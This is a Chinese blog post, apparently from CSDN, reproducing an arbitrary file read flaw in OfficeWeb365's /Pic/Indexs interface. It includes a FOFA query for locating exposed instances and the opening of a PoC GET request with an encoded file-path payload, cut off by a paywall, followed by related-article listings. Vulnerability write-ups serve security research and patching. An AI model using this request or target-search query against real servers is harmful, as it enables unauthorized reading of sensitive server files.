OfficeWeb365 Indexs 任意文件读取漏洞复现

已于 2024-01-04 15:39:30 修改
阅读量1.8k 收藏 11
点赞数 14
分类专栏: 漏洞复现 文章标签: web3 web安全
于 2023-12-29 00:27:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/135280791
版权

0x01 产品简介

OfficeWeb365 是专注于 Office 文档在线预览及PDF文档在线预览云服务,包括 Microsoft Word 文档在线预览、Excel 表格在线预览、Powerpoint 演示文档在线预览,WPS 文字处理、WPS 表格、WPS 演示及 Adobe PDF 文档在线预览。

0x02 漏洞概述

OfficeWeb365 /Pic/Indexs接口处存在任意文件读取漏洞,攻击者可通过独特的加密方式对payload进行加密,读取任意文件,获取服务器敏感信息,使系统处于极不安全的状态。

0x03 复现环境

FOFA:body="请输入furl参数" || header="OfficeWeb365" || banner="OfficeWeb365"

0x04 漏洞复现

PoC

GET /Pic/Indexs?imgs=DJwkiEm6KXJZ7aEiGyN4Cz83Kn1PLaKA09 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchan
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 14
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
订阅专栏
officeWeb365 Indexs接口任意文件读取漏洞复现 [附POC]
薛定谔嘚喵博客
01-05 1116
officeWeb365服务的客户 提供office在线预览及PDF在线预览服务,支持Word文档在线预览、Excel在线预览、PowerPoint在线预览、WPS等Office文件在线预览,支持所有浏览器及移动设备Mobile预览,无需安装ActiveX控件,无需客户端部署即可实现办公文档在线预览。其接口Indexs存在任意文件读取漏洞
Office365-Indexs-任意文件读取
waxcj的博客
01-04 569
20240104
漏洞复现-Office Web 365 任意文件读取漏洞(附漏洞检测脚本)
jjjj1029056414的博客
01-04 965
漏洞复现-Office Web 365 任意文件读取漏洞,附带自己写的poc脚本
officeWeb365 Indexs接口存在任意文件读取漏洞复现
fly夏天的博客
01-25 1196
officeWeb365 Indexs接口存在任意文件读取漏洞复现,并提供了读取任意文件的方法。
OfficeWeb 365 存在任意文件下载漏洞-1day未公开漏洞
weixin_43167326的博客
01-29 461
OfficeWeb 365是一款由Microsoft开发的基于云端的办公套件,提供了丰富的办公工具和功能,包括文档编辑、电子表格、幻灯片演示等,方便用户实现高效办公和协作。
golang实现http服务器处理静态文件示例
09-21
在Golang中,构建一个HTTP服务器来处理静态文件是一项常见的任务,特别是在开发Web应用时。本文将详细讲解如何使用Go语言实现这一功能,并分析提供的示例代码。 首先,我们来看一下标题和描述中提到的关键知识点: ...
WEB安全手册(sql注入,单字节注入)
08-04
"WEB安全手册" 以下是从给定的文件中生成的相关知识点: 一、Apache 安全配置 1. 隐藏 Apache 的版本号及其它敏感信息 Apache 的版本号和操作系统版本等敏感信息可能会被黑客所用,因此需要隐藏这些信息。可以在...
Jspbook 文件缓存
10-09
<filter-name>CacheFilter <filter-class>... <param-name>cacheTimeout <param-value>300 <param-name>locale-sensitive <param-value>true ... <url-pattern>/indexs.jsp </filter-mapping>
29.Oracle表空间和数据文件1
08-08
例如,创建名为DATA和INDEXS的表空间,每个都包含128MB的数据文件。创建表空间时,可以指定多个数据文件以实现数据的冗余和负载均衡。 8. **扩展或收缩表空间**:随着数据库的增长,可能需要增加表空间的大小;反之...
OfficeWeb 365 某接口存在任意文件读取漏洞-1day未公开漏洞
最新发布
weixin_43167326的博客
02-01 373
技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
OfficeWeb365 SaveDraw 文件上传漏洞复现
0xSec
12-13 1501
OfficeWeb365 SaveDraw接口处存在文件上传漏洞,攻击者可通过该漏洞直接上传一个 webshell 到服务器上,获取服务器权限,进⽽控制整个 web 服务器。
漏洞复现Office365-Indexs-任意文件读取
失心少年
01-13 263
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。Office 365 Indexs接口存在一个任意文件读取漏洞,攻击者可以通过构造精心设计的请求,成功利用漏洞读取服务器上的任意文件,包括敏感系统文件和应用程序配置文件等。通过利用此漏洞,攻击者可能获得系统内的敏感信息,导致潜在的信息泄露风险。
officeweb365 试读
qq_39856096的博客
01-27 535
officeweb365 试读 public function ceshi(){ $file_url = I('file_url')?I('file_url') :'202001011111,2'; // $file_url = 'http://xxxx-medical.oss-cn-beijing.aliyuncs.com/document/1611218159000.docx'; $data = $this->encrypt('.
微软Office惊曝严重漏洞:修复方法在此
weixin_33997389的博客
08-09 171
日前,多家安全软件企业发布公告称,微软Office的OLE(对象嵌入与链接)处理机制上存在一个严重漏洞。 黑客和攻击者可能利用此漏洞通过诱使用户打开藏有恶意代码的Office文件,从而在系统上执行任意命令,达到控制用户系统目的。 据悉,该漏洞影响Office所有版本。用户可能收到一个包含恶意代码的Office文件(包含但不限于Word、PPT、Exce...
officeweb365 java_使用 Office for web 在 Microsoft 365 中协同工作
weixin_32265069的博客
02-19 800
提示若要帮助您的工作组成员快速访问文档,请向他们发送链接:在文档名称旁边单击“打开菜单”,然后单击“共享”。以下是与他人进行协作时应谨记的一些事项:Word 文档和 OneNote 笔记本 如果某些人正在使用 Word 或 OneNote 桌面程序,而其他人正在使用 Office 网页版 程序,也没关系。 在桌面程序中,共同创作在最新版本的 Office (Mac 和 Windows)中最适...
OfficeWeb365在线预览
专搞技术的小兔子
06-20 737
OfficeWeb365在线预览
调用office web 365接口实现在线预览word文档,PDF,PPT
热门推荐
qq_27717857的博客
03-08 1万+
我项目中是直接用iframe显示: var id='office web 365创建的域名及端口的ID' var my_url="office web 365创建的域名及端口"+"后台接口返回的文档地址或服务器保存的静态文档" var iframe_src='http://ow365.cn/?i='+id+'&furl='+my_url; document.getElement
Office 远程代码执行漏洞 复现
weixin_53696027的博客
06-19 647
Office 远程代码执行漏洞 复现
uniapp里面indexs++是什么意思
05-10
`indexs++` 是一个自增运算符,它的意思是将 `indexs` 变量的值加 1,并将加 1 后的值赋值给 `indexs` 变量。这个运算符可以简写为 `indexs += 1` 或者 `indexs = indexs + 1`。在 `uniapp` 中,它一般用于循环或者数组的索引操作,用来遍历数组或者列表。例如: ``` var arr = [1, 2, 3, 4, 5]; var indexs = 0; while (indexs < arr.length) { console.log(arr[indexs]); indexs++; } ``` 上面的代码中,`indexs` 变量初始值为 0,循环遍历数组 `arr`,每次输出数组元素并将 `indexs` 自增,直到 `indexs` 大于等于数组长度为止。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值